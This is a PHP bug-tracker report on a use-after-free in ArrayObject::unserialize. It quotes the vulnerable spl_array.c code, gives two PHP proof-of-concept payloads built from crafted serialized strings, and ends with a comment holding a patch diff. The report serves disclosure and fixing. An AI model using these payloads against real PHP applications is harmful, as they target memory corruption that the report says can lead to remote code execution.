|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
[2015-07-27 14:37 UTC] taoguangchen at icloud dot com
Description:
------------
I has reported some similar bugs in BUG#69425, but these bugs are not be fixed and can be exploited still.
```
if (*p!='m') {
if (*p!='a' && *p!='O' && *p!='C' && *p!='r') {
goto outexcept;
}
intern->ar_flags &= ~SPL_ARRAY_CLONE_MASK;
intern->ar_flags |= flags & SPL_ARRAY_CLONE_MASK;
zval_ptr_dtor(&intern->array);
ALLOC_INIT_ZVAL(intern->array);
if (!php_var_unserialize(&intern->array, &p, s + buf_len, &var_hash TSRMLS_CC)) {
goto outexcept;
}
}
if (*p != ';') {
goto outexcept;
}
++p;
/* members */
if (*p!= 'm' || *++p != ':') {
goto outexcept;
}
++p;
ALLOC_INIT_ZVAL(pmembers);
if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) {
zval_ptr_dtor(&pmembers);
goto outexcept;
}
```
unserialize() allow to use R: or r: to set references. so attacker can set references to &intern->array and freed it, then set references via &pmembers will use that already freed memory. it is possible to execute arbitrary code remotely.
PoC1:
```
$inner = 'x:i:0;O:12:"DateInterval":1:{s:1:"y";R:3;};m:a:1:{i:0;R:2;}';
$exploit = 'C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}';
$data = unserialize($exploit);
for($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
var_dump($data);
```
PoC2:
```
class test
{
var $ryat;
function __wakeup()
{
$this->ryat = 'ryat';
}
}
$inner = 'x:i:0;O:4:"test":1:{s:4:"ryat";R:3;};m:a:1:{i:0;R:2;}';
$exploit = 'C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}';
$data = unserialize($exploit);
for($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
var_dump($data);
```
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sun Oct 27 16:01:27 2024 UTC |
I post a patch for 5.4 series. (Test on 5.4 series) diff --git a/php-5.4.43/spl_array.c b/php-5.4.43-fixed/spl_array.c index ec9ce21..d1c6c4e 100644 --- a/php-5.4.43/spl_array.c +++ b/php-5.4.43-fixed/spl_array.c @@ -1777,6 +1777,8 @@ SPL_METHOD(Array, unserialize) zval_ptr_dtor(&pflags); goto outexcept; } + + var_push_dtor(&var_hash, &pflags); --p; /* for ';' */ flags = Z_LVAL_P(pflags); @@ -1802,6 +1804,8 @@ SPL_METHOD(Array, unserialize) if (!php_var_unserialize(&intern->array, &p, s + buf_len, &var_hash TSRMLS_CC)) { goto outexcept; } + + var_push_dtor(&var_hash, &intern->array); } if (*p != ';') { goto outexcept; @@ -1819,6 +1823,8 @@ SPL_METHOD(Array, unserialize) zval_ptr_dtor(&pmembers); goto outexcept; } + + var_push_dtor(&var_hash, &pmembers); /* copy members */ if (!intern->std.properties) {